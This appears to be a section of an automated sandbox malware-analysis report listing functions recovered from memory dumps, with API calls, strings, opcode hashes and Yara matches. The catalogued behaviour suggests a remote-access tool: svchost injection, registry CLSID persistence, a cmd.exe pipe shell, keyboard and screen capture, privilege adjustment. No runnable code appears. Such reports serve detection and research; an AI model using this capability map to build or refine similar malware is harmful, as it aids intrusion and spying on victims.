                                                                                    • API ID: Heap$AllocProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1617791916-0
                                                                                    • Opcode ID: 32ef3246600ae5dc6d1db08bfa9b01ffe47a8a0569be156b9e695a119a47df84
                                                                                    • Instruction ID: 231d99f971930a4c49f122460777a86ba3700e2dce01435603e142206a5f7014
                                                                                    • Opcode Fuzzy Hash: 32ef3246600ae5dc6d1db08bfa9b01ffe47a8a0569be156b9e695a119a47df84
                                                                                    • Instruction Fuzzy Hash: 09213A70A0021D8BDB20EF69DD44BDAB7B5FB88315F0051D9E809E7200E734AEA1CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED2560, Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                    • EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • LeaveCriticalSection.KERNEL32(-0000006C), ref: 04ED25BF
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED25C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    • Opcode ID: 0a6c8982c03dd6802053e8c65e895f2852d0ab1b9a343d9cd0e4e6ae2356efc8
                                                                                    • Instruction ID: 10a82aa71a4650d963b7bad015d2f980eb625cdd089ec57fcb51407e79412d95
                                                                                    • Opcode Fuzzy Hash: 0a6c8982c03dd6802053e8c65e895f2852d0ab1b9a343d9cd0e4e6ae2356efc8
                                                                                    • Instruction Fuzzy Hash: 88018C32401208BBDB11AF59DD84BEEBBB8FF84315F145059EE1423290C775BA56DAA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1D30, Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000054,00000000,00000000,?,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000), ref: 04ED1D3F
                                                                                    • SetLastError.KERNEL32(00000000,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D51
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D65
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,80004005,80004005,?,?,04ED24C5,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04ED1D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3832147951-0
                                                                                    • Opcode ID: bf601b29d67e5f33c3ef84bad2682ee12d15c70f185f2529dfa690a89df2b986
                                                                                    • Instruction ID: f973905411621287d904480a05c81315efebdeedb86a231f90fc3c2f1eb170d2
                                                                                    • Opcode Fuzzy Hash: bf601b29d67e5f33c3ef84bad2682ee12d15c70f185f2529dfa690a89df2b986
                                                                                    • Instruction Fuzzy Hash: B9F09037301110ABD3005A9AE848BAAF76CEBC9267F044137FA06C3200CB359C05C6B0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: svchost.exe PID: 2968 Parent PID: 5336 svchost.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 0000024B7D0EC6B0, Relevance: 89.7, APIs: 40, Strings: 11, Instructions: 478libraryloaderthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$AddressHandleProc$CloseLibraryLoadThread$CreateOpen$ContextCurrentProcess32$AllocCodeDirectoryExitFirstMemoryModuleNextObjectResumeSingleSleepSnapshotSystemTerminateToolhelp32UserVersionVirtualWaitWritewsprintf
                                                                                    • String ID: %ssvchost.exe -k SystemNetworkService$@$Control$DeleteProcThreadAttributeList$Dispatch$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$kernel32.dll
                                                                                    • API String ID: 257342752-1674703022
                                                                                    • Opcode ID: 49290ec657bfe98c2b9f6aa29abe0264a29374fab45202733a7c48c8ccdc69bd
                                                                                    • Instruction ID: 17f5ef8208e27e524228d61143691c39c7044459d34c821e4b467bfa74ea8db3
                                                                                    • Opcode Fuzzy Hash: 49290ec657bfe98c2b9f6aa29abe0264a29374fab45202733a7c48c8ccdc69bd
                                                                                    • Instruction Fuzzy Hash: FF22A233301A408AEB56EB35F8683AAB7A9FBC57C4F445129DA4A43BE4EF39C515C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EF5E0, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 149threadnetworksynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateInternetThread$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                                                    • String ID: AppService$Mozilla/4.0 (compatible)$SystemNetworkService$netsvcs$svchost.exe
                                                                                    • API String ID: 949907800-553284339
                                                                                    • Opcode ID: 94f1a95958b2879f0eb2bdfb5b228bb3b2da66d3d6364c05f4f9ad9e88ee521e
                                                                                    • Instruction ID: 7f413ee52e9d73a73162038efb5b90a232cdf87eef19e68004ed618f51bed061
                                                                                    • Opcode Fuzzy Hash: 94f1a95958b2879f0eb2bdfb5b228bb3b2da66d3d6364c05f4f9ad9e88ee521e
                                                                                    • Instruction Fuzzy Hash: AF616022605B4189FB26EB31B96C35AA798FBC9BD4F842129D94E46BE4DF3DC014C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7C9A02E8, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 421COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.809176620.0000024B7C9A0000.00000040.00000001.sdmp, Offset: 0000024B7C9A0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 8efb2fe887b23dcbf2071df45b498d4b0a216b595415067a83ffe35f8033a6fe
                                                                                    • Instruction ID: c282bd005d5da70a69f8d7246fe02f7f39198120d02a13b570adf36933b8cef5
                                                                                    • Opcode Fuzzy Hash: 8efb2fe887b23dcbf2071df45b498d4b0a216b595415067a83ffe35f8033a6fe
                                                                                    • Instruction Fuzzy Hash: DAD1A931218A058BE7EEDE39C4993BAB3E1FBD5306F54552DD48BC3586DF24E842C681
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EBE60, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 85registrythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 709688788-2346361075
                                                                                    • Opcode ID: 41c290a2661ca398f0845d53f402d7983a9f4a8f9d161a995b5b27ee8e266ee2
                                                                                    • Instruction ID: d7bed04d1a1800c49c94b912b90bbbf123cfc11e0b2919f1a3ffdec990d50384
                                                                                    • Opcode Fuzzy Hash: 41c290a2661ca398f0845d53f402d7983a9f4a8f9d161a995b5b27ee8e266ee2
                                                                                    • Instruction Fuzzy Hash: CF415C73204B8586EB21DF65F59839AFBA8F7C8BD0F405115EA8943B98DF79C168CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EC140, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 101registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3581893009-1865207932
                                                                                    • Opcode ID: e4216eebd3811767217d7f8fa42a0fbedc604489aaa92369a2032f0a656ca1e6
                                                                                    • Instruction ID: 2793fc6034c0dbda97a7cd0c9d61391d84fe33e3bf8157fd3aed1caec564165f
                                                                                    • Opcode Fuzzy Hash: e4216eebd3811767217d7f8fa42a0fbedc604489aaa92369a2032f0a656ca1e6
                                                                                    • Instruction Fuzzy Hash: DE41C433214A8086DB619F70F49879EF7A8F7C9BC0F486119EA9A47AD9DF39C514CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EDA00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressAdjustLibraryLoadPrivilegeProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 2041504798-64178277
                                                                                    • Opcode ID: db2a72ec1006c7efc9c8359562ea7c900fdcfac16ce5a9aec0e7e2db51f45424
                                                                                    • Instruction ID: 904959bf2d5a1f3259202f796974edae1ebc7568ef14651d75eac3ee803a5b37
                                                                                    • Opcode Fuzzy Hash: db2a72ec1006c7efc9c8359562ea7c900fdcfac16ce5a9aec0e7e2db51f45424
                                                                                    • Instruction Fuzzy Hash: 07E06533716601C7EA19DF36E8956957364E7D57C0F885029D50A436D0DF39C6A9CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E94C0, Relevance: 7.5, APIs: 5, Instructions: 41processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 592884611-0
                                                                                    • Opcode ID: 14d0c5f47cbed084a160ebf99d91352bc093908ee40379c1256aa4e37cac371a
                                                                                    • Instruction ID: e4527ef9168e52a9ae3d61b53fed7e516ff6cad74799605ee7c6abdd110186a2
                                                                                    • Opcode Fuzzy Hash: 14d0c5f47cbed084a160ebf99d91352bc093908ee40379c1256aa4e37cac371a
                                                                                    • Instruction Fuzzy Hash: 6C112A33204B8486EB21DB21F45835AB7A8F7C9BC0F545225DA9D47B98EF39C559CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0ED830, Relevance: 6.0, APIs: 4, Instructions: 16sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 4201418100-0
                                                                                    • Opcode ID: 797d003a799a7b3362cf51119329a3c2813fa8145dcca39bd4f8ef1c5edbf09c
                                                                                    • Instruction ID: be4dd10aeba9b506f262a136fa87806c9251ba1858f0b9aa14f82b2d0ee288cd
                                                                                    • Opcode Fuzzy Hash: 797d003a799a7b3362cf51119329a3c2813fa8145dcca39bd4f8ef1c5edbf09c
                                                                                    • Instruction Fuzzy Hash: 88E01222A20600C3F70AEB71EDAD359A65AE7EE7C1F884135C00785AE0DF2DC5AAC311
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D10EAC4, Relevance: 2.5, APIs: 2, Instructions: 19memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    • Opcode ID: 14f1d82d82a540ef03adf27bcd25e030a721660095f7997b8c0c56de99b93bc0
                                                                                    • Instruction ID: 95351d76e1738c0405ea6723544291b0beef103a8e9ca3b28163d77181a5dc18
                                                                                    • Opcode Fuzzy Hash: 14f1d82d82a540ef03adf27bcd25e030a721660095f7997b8c0c56de99b93bc0
                                                                                    • Instruction Fuzzy Hash: 3CE0865270110183FF06BBF3984E36496E95BC47C0F048824D80546AD1DB28C4A18350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0D10D0, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Startup_onexit
                                                                                    • String ID:
                                                                                    • API String ID: 3012808385-0
                                                                                    • Opcode ID: 412cf2d83e2b313f5d0750eb9ff5afe8794e91e36867a5953797e847cb732bc0
                                                                                    • Instruction ID: f1461b5ff4a42239ad451ed6bf36678faeadec0111046e25fa423d23a54318a6
                                                                                    • Opcode Fuzzy Hash: 412cf2d83e2b313f5d0750eb9ff5afe8794e91e36867a5953797e847cb732bc0
                                                                                    • Instruction Fuzzy Hash: 93F01237214A84DAE712DF34E459699B368F78D784F849411E94D47B95DF3CD125CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7C9A0000, Relevance: 1.4, APIs: 1, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.809176620.0000024B7C9A0000.00000040.00000001.sdmp, Offset: 0000024B7C9A0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                                                    • Instruction ID: 65c47a1e96f885ac6301e83002c01536bd2b9a94da7e8f344e3c8eb529878a20
                                                                                    • Opcode Fuzzy Hash: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                                                    • Instruction Fuzzy Hash: D331A03160CB588FEBCAEE28945976AB7E1EBA4311F00055EA48ED3282DF64E901C781
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0000024B7D0E6E10, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 167pipesleepprocessCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
                                                                                    • String ID: $\cmd.exe
                                                                                    • API String ID: 3838570663-3339350558
                                                                                    • Opcode ID: 09b7ce65b4cc2eb8b3b3f58e96f0269d7ff97d1481b56506d86a65aa62fe847d
                                                                                    • Instruction ID: a91ab893271775d3efaa3af5b81f05390c1a7b6c965630e45e7073ba9606879f
                                                                                    • Opcode Fuzzy Hash: 09b7ce65b4cc2eb8b3b3f58e96f0269d7ff97d1481b56506d86a65aa62fe847d
                                                                                    • Instruction Fuzzy Hash: 07812733215B808AE752DF71E85869DB7B8F7C8B88F501219DA8D43BA8DF39C569C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0D5E30, Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 255filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileFindFirstlstrlenwsprintf
                                                                                    • String ID: %s%s%s$%s%s*.*$l$list<T> too long
                                                                                    • API String ID: 4287520746-3350904371
                                                                                    • Opcode ID: 8912dc01a5bbab821f4875a34c9c48f64b12a23d423a8dd6d5616daf676b2a8f
                                                                                    • Instruction ID: d59d7eeed5e2cc331852d5f91ee3a3ef384abb9882201b89e3fc5174ae24f24c
                                                                                    • Opcode Fuzzy Hash: 8912dc01a5bbab821f4875a34c9c48f64b12a23d423a8dd6d5616daf676b2a8f
                                                                                    • Instruction Fuzzy Hash: 4BC1BF37204A8481EA12EB61F4683AAE3A8F7C5BE4F445216DB9E47BE9DF78C155C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EEE50, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 181servicememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleLocal$Free$AllocEnumOpenServicesStatus$ConfigManagerQuery
                                                                                    • String ID: -k netsvcs
                                                                                    • API String ID: 2067902596-1604415765
                                                                                    • Opcode ID: bc16f9542be6cb73d44510a536ae53fbdd7c051d4607f2977742da424336212e
                                                                                    • Instruction ID: 0d67a270aa92b0d4c5f9ae273227b196365569f7601df1ec62e0b594eb7d5671
                                                                                    • Opcode Fuzzy Hash: bc16f9542be6cb73d44510a536ae53fbdd7c051d4607f2977742da424336212e
                                                                                    • Instruction Fuzzy Hash: 37715A33205B418AEB66DF62B45835EFBA9F7C9BC0F445129DA8A43B98DF39C554CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EAE60, Relevance: 25.6, APIs: 17, Instructions: 104stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2173410017-0
                                                                                    • Opcode ID: db4d12520346ddeb144483ae4b36c57262f804e356013a81b405ff8b4fc44772
                                                                                    • Instruction ID: 72f7323dcea1df1aad820382638f9c5125ab8848f1f14616e256e2b4fc1ae289
                                                                                    • Opcode Fuzzy Hash: db4d12520346ddeb144483ae4b36c57262f804e356013a81b405ff8b4fc44772
                                                                                    • Instruction Fuzzy Hash: 3451AD23300A85D9EB22EF31ED5C3DAA7A9F7D97C8F849115C50D869E8EF28C219C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E0E00, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 194registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$Enum$wsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 1512917468-1183003970
                                                                                    • Opcode ID: dda6cf140eeb3d3e7fe3390d9d818ec4ccc4efd47133e7857fb9fd68d8e7d55c
                                                                                    • Instruction ID: bc8a203d2a0aa81bd5de9a56c717de6deedb194a22f67e31c23ab7ba5c459487
                                                                                    • Opcode Fuzzy Hash: dda6cf140eeb3d3e7fe3390d9d818ec4ccc4efd47133e7857fb9fd68d8e7d55c
                                                                                    • Instruction Fuzzy Hash: 32916A33208B8186EB21DF25F85879EF7A8F7C97D4F40111AEA9947A98EF79C514CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0D9640, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                    • String ID: <$<$`
                                                                                    • API String ID: 1949328396-2220807966
                                                                                    • Opcode ID: 964ccee185e789bb3186dfb71f77e9580d6f7b358ddcbe5aa23466650843fe61
                                                                                    • Instruction ID: 1e61a7862140224f8b27fd191b3b89c3c01abb95df73ab30e25267cf43ceccf5
                                                                                    • Opcode Fuzzy Hash: 964ccee185e789bb3186dfb71f77e9580d6f7b358ddcbe5aa23466650843fe61
                                                                                    • Instruction Fuzzy Hash: 66416633610B9082E759CF34A46879D76A9F788F88F18612AEB1846BC8CF79C451CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E4E00, Relevance: 12.1, APIs: 8, Instructions: 103keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 1082231092-0
                                                                                    • Opcode ID: e56a73ee7c23307f60af2bb8df704ad2fbc99a4d8c96a4aaa103ad3efe97439c
                                                                                    • Instruction ID: b643e736b271364f43531caeef9d53fe47a3b28e4676a1e745cae70a261d4c4a
                                                                                    • Opcode Fuzzy Hash: e56a73ee7c23307f60af2bb8df704ad2fbc99a4d8c96a4aaa103ad3efe97439c
                                                                                    • Instruction Fuzzy Hash: 4F412573B006948BE316EB35F96CB6DF769EBC6BC8F049215E90546AD4DB38C851C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E4660, Relevance: 7.6, APIs: 5, Instructions: 62synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Compatible$Window$DesktopEventMonitor$CloseCursorDisplayEnumFromHandleInfoLoadObjectReleaseSettingsSingleWait_invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 2947445764-0
                                                                                    • Opcode ID: 6c2e6c7e15d31867e4bfff414c3be7fe13dbb01ff193d9f9c6558bdd1275d659
                                                                                    • Instruction ID: 6fcff12eb5bab6b35ed64aab9014db7e43a098b4525258da988a07cc898b8736
                                                                                    • Opcode Fuzzy Hash: 6c2e6c7e15d31867e4bfff414c3be7fe13dbb01ff193d9f9c6558bdd1275d659
                                                                                    • Instruction Fuzzy Hash: B3214833205B8082E7159B65F554789B7A9F785780F10522AEB8903BA4DF39D074CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E9610, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$wsprintf$FileInfoVersion$Size
                                                                                    • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                                                    • API String ID: 2317827058-2104189134
                                                                                    • Opcode ID: 354f63773257b1beebd2677b0efc278238e69b90cde0f85435079b1b81b1e1cb
                                                                                    • Instruction ID: d4488d6ae67f70aeef75e7075012ba5a5ee8798eed97673aed296bca6c286a40
                                                                                    • Opcode Fuzzy Hash: 354f63773257b1beebd2677b0efc278238e69b90cde0f85435079b1b81b1e1cb
                                                                                    • Instruction Fuzzy Hash: 4B51B027304A8489EB22DF25F4583AAB7A4F7C5BC4F445116EA8E83AE4EF3DC519C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0D25F0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68synchronizationsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleep_invalid_parameter_noinfowave
                                                                                    • String ID: |
                                                                                    • API String ID: 3963561435-2343686810
                                                                                    • Opcode ID: 91a27b4a1239f5f4d3d5cb5ef6ad1dce6f0df01996c6ccc63c6d7ac345f79a5a
                                                                                    • Instruction ID: c259aa505f5e23633af306ad59878eaf9153504beacc00581a8f2a576fd10869
                                                                                    • Opcode Fuzzy Hash: 91a27b4a1239f5f4d3d5cb5ef6ad1dce6f0df01996c6ccc63c6d7ac345f79a5a
                                                                                    • Instruction Fuzzy Hash: 00317A33205B8082EB12DB75F95974AB7A9F7C67D4F10522AEA9943BE4DF39C0A4C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0F1610, Relevance: 13.6, APIs: 9, Instructions: 100memorynetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$ErrorFreeHeapLast$send
                                                                                    • String ID:
                                                                                    • API String ID: 3617958714-0
                                                                                    • Opcode ID: 1e8952f0f5a339e1106fafc25898707f3444e0f8551e1178c98ecadb8a89b98c
                                                                                    • Instruction ID: 65de5f3f456617b8b39c3af261b4be9c1d17c2bc2b9dce225e0cf93ad53f06df
                                                                                    • Opcode Fuzzy Hash: 1e8952f0f5a339e1106fafc25898707f3444e0f8551e1178c98ecadb8a89b98c
                                                                                    • Instruction Fuzzy Hash: 24416937201A4086E765CB22F56879AB7B8F799BD0F144129CF9E83B90EF39D4A5C301
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D105670, Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 492COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: +$-$f$p
                                                                                    • API String ID: 3215553584-588565063
